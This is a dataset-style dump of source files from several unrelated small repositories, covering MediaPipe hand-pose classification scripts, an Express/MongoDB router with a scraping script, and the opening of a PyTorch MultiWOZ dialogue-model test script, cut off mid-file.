cv2.COLOR_BGR2RGB)) # Convert the BGR image to RGB before processing.\n\n try:\n hand = results.multi_handedness[-1].classification.pop().label # To get which hand (left, right)\n except TypeError as e:\n hand = None\n\n if not results.multi_hand_landmarks:\n continue\n\n annotated_image = image.copy()\n\n for hand_landmarks in results.multi_hand_landmarks:\n\n if args.save_images == 'True':\n cv2.imwrite(args.save_dir + '/' + file, cv2.flip(annotated_image, 1))\n\n points = [file, dir, hand]\n\n for point in mp_hands.HandLandmark:\n normalized_landmark = hand_landmarks.landmark[point]\n points.append(normalized_landmark.x)\n points.append(normalized_landmark.y)\n points.append(normalized_landmark.z)\n\n landmarks.append(points)\n\n return landmarks\n\n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--save_dir', type=str, default='annotated_images', help='Directory containing the saved images')\n p.add_argument('--gesture_folder', type=str, required=False, default='All_images', help=\"Gesture Training images\")\n p.add_argument('--save_images', type=str, required=False, default='False', help='Flag to save annotated images')\n p.add_argument('--name_csv', type=str, required=False, default='landmarks',\n help='Name of the csv to save the landmarks')\n\n print(p.format_usage())\n start = time.time()\n args = 
p.parse_args()\n\n landmarks = detect_hands(args)\n\n csv_columns = ['file_name', 'label', 'hand',\n '0-wrist.x', '0-wrist.y', '0-wrist.z',\n '1-thumb_cmc.x', '1-thumb_cmc.y', '1-thumb_cmc.z',\n '2-thumb_mcp.x', '2-thumb_mcp.y', '2-thumb_mcp.z',\n '3-thumb_ip.x', '3-thumb_ip.y', '3-thumb_ip.z',\n '4-thumb_tip.x', '4-thumb_tip.y', '4-thumb_tip.z',\n '5-index_finger_mcp.x', '5-index_finger_mcp.y', '5-index_finger_mcp.z',\n '6-index_finger_pip.x', '6-index_finger_pip.y', '6-index_finger_pip.z',\n '7-index_finger_dip.x', '7-index_finger_dip.y', '7-index_finger_dip.z',\n '8-index_finger_tip.x', '8-index_finger_tip.y', '8-index_finger_tip.z',\n '9-middle_finger_mcp.x', '9-middle_finger_mcp.y', '9-middle_finger_mcp.z',\n '10-middle_finger_pip.x', '10-middle_finger_pip.y', '10-middle_finger_pip.z',\n '11-middle_finger_dip.x', '11-middle_finger_dip.y', '11-middle_finger_dip.z',\n '12-middle_finger_tip.x', '12-middle_finger_tip.y', '12-middle_finger_tip.z',\n '13-ring_finger_mcp.x', '13-ring_finger_mcp.y', '13-ring_finger_mcp.z',\n '14-ring_finger_pip.x', '14-ring_finger_pip.y', '14-ring_finger_pip.z',\n '15-ring_finger_dip.x', '15-ring_finger_dip.y', '15-ring_finger_dip.z',\n '16-ring_finger_tip.x', '16-ring_finger_tip.y', '16-ring_finger_tip.z',\n '17-pinky_mcp.x', '17-pinky_mcp.y', '17-pinky_mcp.z',\n '18-pinky_pip.x', '18-pinky_pip.y', '18-pinky_pip.z',\n '19-pinky_dip.x', '19-pinky_dip.y', '19-pinky_dip.z',\n '20-pinky_tip.x', '20-pinky_tip.y', '20-pinky_tip.z',\n ]\n\n csv_landmarks = pd.DataFrame(landmarks, columns=csv_columns)\n print(\"Saving landmarks to landmarks.csv...\")\n csv_landmarks.to_csv(f'data/{args.name_csv}.csv', index=False)\n print(f\"total time taken: {(time.time() - start) / 60} mins\")\n\n\n" }, { "alpha_fraction": 0.49492642283439636, "alphanum_fraction": 0.5134449601173401, "avg_line_length": 44.83720779418945, "blob_id": "60c5b7f6667fc4c653b6a864370e99b766d72051", "content_id": "64c045f9a84ad6e449b237811b12dadfb86166e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7884, "license_type": "no_license", "max_line_length": 135, "num_lines": 172, "path": "/src/live_test.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time\nimport json\nimport tensorflow as tf\nfrom argparse import ArgumentParser\nfrom tensorflow.keras.models import load_model\n\n\nclass WebcamTest:\n mp_drawing = mp.solutions.drawing_utils\n mp_hands = mp.solutions.hands\n\n def __init__(self, model):\n self.hands = mp.solutions.hands\n self.model = model\n self.internal_camera_index = None\n self.external_camera_index = None\n self.video = None\n self.select_camera_source()\n\n with open('encoded_labels.json', 'r') as f:\n self.labels = json.load(f, encoding='unicode_escape')\n self.font = cv2.FONT_HERSHEY_COMPLEX_SMALL\n\n def select_camera_source(self):\n \"\"\"\n Tries to find the camera source.\n Priority is given to external webcams over built-in cameras\n because of better quality input.\n Assuming,\n 1. The external camera cam be located with an index < 5.\n 2. 
In-built camera index is\n :return: selected camera source\n \"\"\"\n for camera_index in range(5, -1, -1):\n camera = cv2.VideoCapture(camera_index)\n print(f\"checking for camera input at index: {camera_index}\")\n success, frame = camera.read()\n if success and frame is not None:\n if camera_index > 1:\n print(f\"external camera found at index: {camera_index}\")\n self.external_camera_index = camera_index\n else:\n print(f\"built-in camera found at index: {camera_index}\")\n self.internal_camera_index = camera_index\n print(f\"camera resolution: {frame.shape[0]} {frame.shape[1]}\")\n camera.release()\n\n if self.external_camera_index:\n self.video = cv2.VideoCapture(self.external_camera_index)\n else:\n self.video = cv2.VideoCapture(self.internal_camera_index)\n\n def detect_hands(self):\n\n with self.hands.Hands(min_detection_confidence=0.5,\n min_tracking_confidence=0.5,\n max_num_hands=1) as hands:\n\n while self.video.isOpened():\n\n success, frames = self.video.read()\n frame = frames.copy()\n image_width, image_height, _ = frames.shape\n\n if not success:\n print(\"No camera connected.\")\n break\n\n start_time = time.time()\n frames = cv2.cvtColor(cv2.flip(frames, 1), cv2.COLOR_BGR2RGB)\n frames.flags.writeable = False\n\n results = hands.process(frames)\n image = cv2.cvtColor(frames, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n for point in WebcamTest.mp_hands.HandLandmark:\n index_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].y * image_width)))\n\n middle_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].y * image_width)))\n\n ring_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.RING_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.RING_FINGER_MCP].y * image_width)))\n\n pinky_finger_mcp = np.array((int(hand_landmarks.landmark[point.PINKY_MCP].x * image_height),\n int(hand_landmarks.landmark[point.PINKY_MCP].y * image_width)))\n\n thumb_cmc = np.array((int(hand_landmarks.landmark[point.THUMB_CMC].x * image_height),\n int(hand_landmarks.landmark[point.THUMB_CMC].y * image_width)))\n\n wrist = np.array((int(hand_landmarks.landmark[point.WRIST].x * image_height),\n int(hand_landmarks.landmark[point.WRIST].y * image_width)))\n\n WebcamTest.mp_drawing.draw_landmarks(\n image, hand_landmarks, WebcamTest.mp_hands.HAND_CONNECTIONS)\n\n vertices = np.array([[index_finger_mcp[0], index_finger_mcp[1]],\n [middle_finger_mcp[0], middle_finger_mcp[1]],\n [ring_finger_mcp[0], ring_finger_mcp[1]],\n [pinky_finger_mcp[0], pinky_finger_mcp[1]],\n [wrist[0], wrist[1]],\n [thumb_cmc[0], thumb_cmc[1]]], dtype=np.int32)\n\n pts = vertices.reshape((-1, 1, 2))\n cv2.polylines(image, [pts], isClosed=True, color=(0, 0, 0), thickness=3)\n\n # fill the palm zone.\n cv2.fillPoly(image, [pts], color=(0, 200, 200))\n\n # horizontal line from index finger to pinky finger\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (pinky_finger_mcp[0], pinky_finger_mcp[1]), (255, 0, 0), thickness=2)\n\n # vertical line from index finger to thumb\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (thumb_cmc[0], thumb_cmc[1]), (0, 0, 255), thickness=2)\n\n landmarks_results = str(results.multi_hand_landmarks[0]).split()\n coordinates_list = [coordinate for coordinate in landmarks_results if 
coordinate != 'landmark' if coordinate != '{'\n if coordinate != '}' if coordinate != 'x:' if coordinate != 'y:' if coordinate != 'z:']\n\n coordinates_array = np.array(coordinates_list, dtype='float32')\n input_array = np.expand_dims(coordinates_array, axis=0)\n prediction = self.model.predict(input_array)\n predicted_label = self.labels[str(np.argmax(prediction))]\n\n else:\n predicted_label = \"No hand\"\n\n cv2.putText(frame, predicted_label, (35, 35), self.font, 1, (255, 0, 0), 1, cv2.LINE_4)\n cv2.putText(frame, str(\"{0:.3f}\".format((time.time() - start_time) * 100)) + 'ms',\n (35, 65), self.font, 1, (0, 0, 255), 2,\n cv2.LINE_4)\n cv2.imshow('Live Test', cv2.resize(frame, (320, 240)))\n cv2.imshow('MediaPipe Hands', cv2.resize(cv2.flip(image, 1), (320, 240)))\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n self.on_destroy()\n\n def on_destroy(self):\n self.video.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n\n p = ArgumentParser()\n p.add_argument('--model_dir', required=False, type=str,\n default='models/model_27-6-6_58/trained_model.h5',\n help='path to trained_model.h5')\n\n print(p.format_usage())\n args = p.parse_args()\n model = load_model(args.model_dir)\n physical_devices = tf.config.list_physical_devices('GPU')\n\n if physical_devices:\n print(\"GPU is available\")\n else:\n print(\"GPU is not available\")\n\n test = WebcamTest(model)\n test.detect_hands()\n" }, { "alpha_fraction": 0.6613067984580994, "alphanum_fraction": 0.6694742441177368, "avg_line_length": 51.22666549682617, "blob_id": "17e020294858b69f808eab7b6dc51d708194b611", "content_id": "a399ed47c0a0f86087275cceff48fdebbf6d7a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3918, "license_type": "no_license", "max_line_length": 135, "num_lines": 75, "path": "/utils/Hand.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.core.numeric import cross \n\nclass Hand():\n\n def __init__(self, mp_hands, hand_landmarks, hand):\n self.IMAGE_WIDTH = 480\n self.IMAGE_HEIGHT = 640\n self.orientation = hand.multi_handedness[-1].classification.pop().label\n self.bbox = None\n self.landmarks = None\n\n self.wrist = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.WRIST].x * self.IMAGE_HEIGHT ),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.WRIST].y * self.IMAGE_WIDTH)))\n\n self.thumb = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y * self.IMAGE_WIDTH)))\n\n self.index_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.middle_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x * self.IMAGE_HEIGHT ),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.ring_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.pinky_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].y * self.IMAGE_WIDTH)))\n\n self.thumb_cmc = 
np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_CMC].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_CMC].y * self.IMAGE_WIDTH)))\n\n self.thumb_ip = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_IP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_IP].y * self.IMAGE_WIDTH)))\n\n self.index_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.middle_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.ring_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.pinky_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_MCP].y * self.IMAGE_WIDTH)))\n\n self.palm_line = [self.index_finger_mcp, self.pinky_mcp]\n\n\n def is_point_above_palm_line(self, point):\n \n if self.cross_product(point) > 0:\n return True\n\n return False\n\n def cross_product(self, point):\n\n vector_1 = [self.palm_line[1][0] - self.palm_line[0][0], self.palm_line[1][1] - self.palm_line[0][1]]\n\n vector_2 = [self.palm_line[1][0] - point[0], self.palm_line[1][1] - point[1]]\n\n result = (vector_1[0] * vector_2[1]) - (vector_1[1] * vector_2[0])\n\n return result\n\n def print_all_finger_tips(self):\n print(f\"wrist point: {self.wrist}\")\n print(f\"thumb: {self.thumb}\")\n print(f\"index finger: {self.index_finger}\")\n print(f\"middle finger: {self.middle_finger}\")\n print(f\"ring finger: {self.ring_finger}\")\n print(f\"pinky finger: {self.pinky_finger}\")\n\n" } ]
21
rsher60/macdata
https://github.com/rsher60/macdata
900f11dc8afd4cf133c1fa954905eb04c62a646c
99f946f48b2d5dbb8266e2470a52a69cf15a5b84
82d7de453a651e342e22332300563db952cb11f8
refs/heads/master
2020-05-17T11:18:44.598063
2019-04-26T19:31:39
2019-04-26T19:31:39
183,683,226
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5967429280281067, "alphanum_fraction": 0.6025591492652893, "avg_line_length": 23.330188751220703, "blob_id": "462165eadb80d8784c4f93bd91c620ee903f9849", "content_id": "7c8b524c2a578ea907680c87ee8a66d8362a37db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2579, "license_type": "no_license", "max_line_length": 101, "num_lines": 106, "path": "/routes/index.js", "repo_name": "rsher60/macdata", "src_encoding": "UTF-8", "text": "var express = require('express');\nvar router = express.Router();\nvar mongo = require('mongodb').MongoClient;\nvar objectId = require('mongodb').ObjectID;\nvar assert = require('assert');\nvar ps = require('python-shell');\nvar dash = require('appmetrics-dash').attach()\n\nvar url = 'mongodb://localhost:27017/test-database-1';\n\n/* GET home page. */\nrouter.get('/', function(req, res, next) {\n res.render('index');\n});\n\n//additions after 2/4/2019\nrouter.get('/python',function(req,res,next){\n ps.PythonShell.run('/PATH/TO/example.py', null, function (err, results)\n { if (err) throw err;\n console.log('finished'); \n console.log(results);\n });\n});\n//--------------------------------------------------\nrouter.get('/download', function(req,res,nect){\n res.render('index3')\n});\n\nrouter.get('/get-data', function(req, res, next) {\n var resultArray = [];\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n var cursor = db.collection('collection').find();\n cursor.forEach(function(doc, err) {\n assert.equal(null, err);\n resultArray.push(doc);\n }, function() {\n db.close();\n // res.render('index4', {items: resultArray});\n return res.json(resultArray)\n console.log(resultArray);\n });\n });\n});\n\n\nrouter.get('/view-data',function(req,res,next){\n\n res.render('index4');\n})\n\n\n\nrouter.post('/insert', function(req, res, next) {\n var item = {\n Area: req.body.Area,\n content: req.body.content,\n author: req.body.author\n };\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').insertOne(item, function(err, result) {\n assert.equal(null, err);\n console.log('Item inserted');\n db.close();\n });\n });\n\n res.redirect('/');\n});\n\nrouter.post('/update', function(req, res, next) {\n var item = {\n Area: req.body.Area,\n content: req.body.content,\n author: req.body.author\n };\n var id = req.body.id;\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').updateOne({\"_id\": objectId(id)}, {$set: item}, function(err, result) {\n assert.equal(null, err);\n console.log('Item updated');\n db.close();\n });\n });\n});\n\nrouter.post('/delete', function(req, res, next) {\n var id = req.body.id;\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').deleteOne({\"_id\": objectId(id)}, function(err, result) {\n assert.equal(null, err);\n console.log('Item deleted');\n db.close();\n });\n });\n});\n\n\n\nmodule.exports = router;\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7371794581413269, "avg_line_length": 50, "blob_id": "2f92c9850f4c14770b32434c7195dfbb3d80d5ad", "content_id": "9d147476cfea896dd2df020223f9c8b008d9589b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/routes/upload-folder/webscrap.py", "repo_name": "rsher60/macdata", "src_encoding": "UTF-8", "text": 
"#install lxml and requests\r\n#install requests\r\nfrom lxml import html\r\nimport requests\r\npage = requests.get('http://econpy.pythonanywhere.com/ex/001.html') #requests.get to retrieve the web page with our data \r\ntree = html.fromstring(page.content) #page.content because html.fromstring imports the data explicityly as butes\r\nbuyers = tree.xpath('//div[@title=\"buyer-name\"]/text()')\r\nprices = tree.xpath('//span[@class=\"item-price\"]/text()')\r\nprint 'Buyers : ', buyers\r\n" } ]
2
charlesqwu/math
https://github.com/charlesqwu/math
d6147328ac47f86965003898632cd47bd81522bf
982c9a6978ee4035717b0873bdcd0be4ad0a28ee
7058d75c2646bf9c154891a2a07a285cb16abacb
refs/heads/master
2021-01-10T13:36:04.916421
2015-11-20T23:37:16
2015-11-20T23:37:16
46,591,894
5
0
null
null
null
null
null
[ { "alpha_fraction": 0.813829779624939, "alphanum_fraction": 0.813829779624939, "avg_line_length": 93, "blob_id": "19f510b8a432faaa8cb7caa2689088fb21b6f0fa", "content_id": "4e077314b66dd0648331344a55543db8784043e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 180, "num_lines": 2, "path": "/README.md", "repo_name": "charlesqwu/math", "src_encoding": "UTF-8", "text": "# math\nAlgorithms for some problems in linear algebra and combinatorics. For example, for generating a binomial coefficient, I have code about a dozen of algorithms for the same function.\n" }, { "alpha_fraction": 0.5604336261749268, "alphanum_fraction": 0.5899729132652283, "avg_line_length": 25.919708251953125, "blob_id": "7fcbf1417db83119a18d413713afd6bf1210f97f", "content_id": "1adfe85fbc0c3aa644185a28dabd2b50dd26d3b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3690, "license_type": "no_license", "max_line_length": 86, "num_lines": 137, "path": "/binomial.py", "repo_name": "charlesqwu/math", "src_encoding": "UTF-8", "text": "# This set of solutions is for calculating the binomial coefficient C(n,k)\n\n# These code snippets have been tested in Python2.7\n# To test in Python3.x, just need to change print statement to print function\n\n# Solution 1: Use the beta() function in the scipy.special module\n# The beta() function is basically an analytic extension of the binomial\n# function from non-negative integers to complex numbers\nfrom scipy.special import beta\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return int(1/((n+1) * beta(n-k+1, k+1)))\n\n\n# Solution 2: Use the convolve() function in the numpy module\n# The discrete convolution between two vectors corresponds to multiplying\n# the two polynomials with coefficients as the two vectors\nfrom numpy import convolve\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n if n < 2: return 1\n kernel, row = [1,1], [1]\n for i in range(n):\n row = convolve(kernel, row)\n return row[k]\n\n\n# Solution 3: Use the polymul() function from the numpy.polynomial module\n# basically the same kind of solution as the above one\nfrom numpy.polynomial import polymul\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n if n < 2: return 1\n kernel, row = [1,1], [1]\n for i in range(n):\n row = polymul(kernel, row)\n return int(row[k])\n\n\n# Solution 4: Use the factorial() function from the math module\nfrom math import factorial\ndef c(n,k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return factorial(n) / (factorial(n-k) * factorial(k))\n\n# or gamma\nfrom math import gamma\ndef c(n,k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return int(gamma(n+1) / (gamma(n-k+1) * gamma(k+1)))\n\n# Solution 5:\n# define a function for falling factorial (aka, Pochhammer notation)\n# falling-factorial(n,k) = n*(n-1)*......*(n-k+1)\ndef ff(n, k):\n return reduce(lambda p,i:p*i, range(n,k,-1), 1)\n\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return ff(n, n-k) / ff(k, 1)\n\n\n# Solution 6: recursive solution\ndef b(n, k):\n if n < 0 or k > n: \n return 0\n if k==0 or k==n: \n return 1\n if k > n/2: \n k = n - k\n return b(n-1,k-1) + b(n-1,k)\n\n\n# Solution 7: iterative (dynamic programming)\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n p=[1]\n for i in range(1, n+1):\n new = 1\n for j in 
range(1, i):\n new, p[j-1] = p[j-1] + p[j], new\n p[-1:] = new, 1\n return p[k]\n\n\n# Solution 8: generate numbers in 0...2^n, and count bits in them\n# c(n,k) = the count of numbers with k bits = 1\n# This algorithm is certainly slow with time complexity O(2^n) --\n# it is listed here just as a possible solution\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n \n \"\"\"\n count=0\n for i in range(pow(2,n)):\n if bin(i).count('1') == k:\n count+=1\n return count\n \"\"\"\n # the line below just implements the above loop using functional programming\n return reduce(lambda c,i:c+1 if bin(i).count('1') == k else c, range(pow(2,n)), 0)\n\n# Solution 9: generate a binomial distribution\nfrom random import random\ndef toss(n, k):\n # print n, k\n count=0\n for i in range(n):\n if random() <= 0.5:\n count += 1\n # print count\n return 1 if count==k else 0\n\ndef c(n, k):\n samples = 1000000\n counts = 0\n for i in range(samples):\n counts += toss(n,k)\n # print counts\n return int(round(counts * pow(2,n) * 1.0 / samples))\n\n# test - print the PASCAL triangle with 20 rows\nfor i in range(20):\n for j in range(i+1):\n print c(i, j),\n print\n\n\n" } ]
2
Jiahuan-Pei/multiwoz-mdrg
https://github.com/Jiahuan-Pei/multiwoz-mdrg
bd9637d257bc41f1947eb6944e9d86caa05fc732
80307795b2776f0adfcae3285955eca2a82f0a26
229f781c72943b041f005142aa769932eaed3197
refs/heads/master
2021-06-25T13:49:28.700608
2021-03-24T01:52:31
2021-03-24T01:52:31
220,971,801
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.618311882019043, "alphanum_fraction": 0.6306151747703552, "avg_line_length": 42.5020751953125, "blob_id": "5e81357049f54287f6b842dfee75839e0f936c0e", "content_id": "1d9f44743256352d03aa7aafd880231da47d5e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10485, "license_type": "no_license", "max_line_length": 181, "num_lines": 241, "path": "/test.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport json\nimport os\nimport shutil\nimport time\n\nimport numpy as np\nimport torch\n\nfrom utils import util, multiwoz_dataloader\nfrom models.evaluator import *\nfrom models.model import Model\nfrom utils.util import detected_device, pp_mkdir\nfrom multiwoz.Evaluators import *\n\n# pp added: print out env\nutil.get_env_info()\n\nparser = argparse.ArgumentParser(description='multiwoz1-bsl-te')\n# 1. Data & Dir\ndata_arg = parser.add_argument_group('Data')\ndata_arg.add_argument('--data_dir', type=str, default='data/multi-woz', help='the root directory of data')\ndata_arg.add_argument('--result_dir', type=str, default='results/bsl/')\ndata_arg.add_argument('--model_name', type=str, default='translate.ckpt')\n\n# 2. MISC\nmisc_arg = parser.add_argument_group('Misc')\nmisc_arg.add_argument('--dropout', type=float, default=0.0)\nmisc_arg.add_argument('--use_emb', type=str, default='False')\nmisc_arg.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\nmisc_arg.add_argument('--no_models', type=int, default=20, help='how many models to evaluate')\nmisc_arg.add_argument('--beam_width', type=int, default=10, help='Beam width used in beamsearch')\nmisc_arg.add_argument('--write_n_best', type=util.str2bool, nargs='?', const=True, default=False, help='Write n-best list (n=beam_width)')\n# 3. 
Here add new args\nnew_arg = parser.add_argument_group('New')\nnew_arg.add_argument('--intent_type', type=str, default=None, help='separate experts by intents: None, domain, sysact or domain_act') # pp added\nnew_arg.add_argument('--lambda_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--mu_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--gamma_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--debug', type=util.str2bool, nargs='?', const=True, default=False, help='if True use small data for debugging')\nargs = parser.parse_args()\nargs.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint('args.device={}'.format(args.device))\n\n# construct dirs\nargs.model_dir = '%s/model/' % args.result_dir\nargs.train_output = '%s/data/train_dials/' % args.result_dir\nargs.valid_output = '%s/data/valid_dials/' % args.result_dir\nargs.decode_output = '%s/data/test_dials/' % args.result_dir\nprint(args)\n\n# pp added: init seed\nutil.init_seed(args.seed)\n\ndef load_config(args):\n config = util.unicode_to_utf8(\n # json.load(open('%s.json' % args.model_path, 'rb')))\n json.load(open('{}{}.json'.format(args.model_dir, args.model_name), 'rb')))\n for key, value in args.__args.items():\n try:\n config[key] = value.value\n except:\n config[key] = value\n\n return config\n\n\ndef loadModelAndData(num):\n # Load dictionaries\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = util.loadDictionaries(mdir=args.data_dir)\n # pp added: load intents\n intent2index, index2intent = util.loadIntentDictionaries(intent_type=args.intent_type, intent_file='{}/intents.json'.format(args.data_dir)) if args.intent_type else (None, None)\n\n # Reload existing checkpoint\n model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index, intent2index)\n model = model.to(detected_device)\n if args.load_param:\n model.loadModel(iter=num)\n\n # # Load validation file list:\n with open('{}/val_dials.json'.format(args.data_dir)) as outfile:\n val_dials = json.load(outfile)\n #\n # # Load test file list:\n with open('{}/test_dials.json'.format(args.data_dir)) as outfile:\n test_dials = json.load(outfile)\n\n return model, val_dials, test_dials, input_lang_word2index, output_lang_word2index, intent2index, index2intent\n\n\ndef decode(num=1, beam_search=False):\n\n model, val_dials, test_dials, input_lang_word2index, output_lang_word2index, intent2index, index2intent = loadModelAndData(num)\n\n delex_path = '%s/delex.json' % args.data_dir\n\n start_time = time.time()\n model.beam_search = beam_search\n\n step = 0 if not args.debug else 2 # small sample for debug\n\n # VALIDATION\n val_dials_gen = {}\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n\n valid_loss += loss_sentence\n val_dials_gen[name] = 
output_words\n\n print('Current VALID LOSS:', valid_loss)\n\n # Valid_Score = evaluateModel(val_dials_gen, val_dials, delex_path, mode='Valid')\n Valid_Score = evaluator.summarize_report(val_dials_gen, mode='Valid')\n # evaluteNLG(val_dials_gen, val_dials)\n\n # TESTING\n test_dials_gen = {}\n test_loss = 0\n for name, test_file in list(test_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(test_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n test_loss += loss_sentence\n test_dials_gen[name] = output_words\n\n test_loss /= len(test_dials)\n\n print('Current TEST LOSS:', test_loss)\n\n # Test_Score = evaluateModel(test_dials_gen, test_dials, delex_path, mode='Test')\n Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n # evaluteNLG(test_dials_gen, test_dials)\n\n print('TIME:', time.time() - start_time)\n return Valid_Score, val_dials_gen, np.exp(valid_loss), Test_Score, test_dials_gen, np.exp(test_loss)\n\n\ndef decodeWrapper(beam_search=False):\n # Load config file\n # with open(args.model_path + '.config') as f:\n with open('{}{}.config'.format(args.model_dir, args.model_name)) as f:\n add_args = json.load(f)\n for k, v in add_args.items():\n if k=='data_dir': # ignore this arg\n continue\n setattr(args, k, v)\n\n args.mode = 'test'\n args.load_param = True\n args.dropout = 0.0\n assert args.dropout == 0.0\n\n # Start going through models\n # args.original = 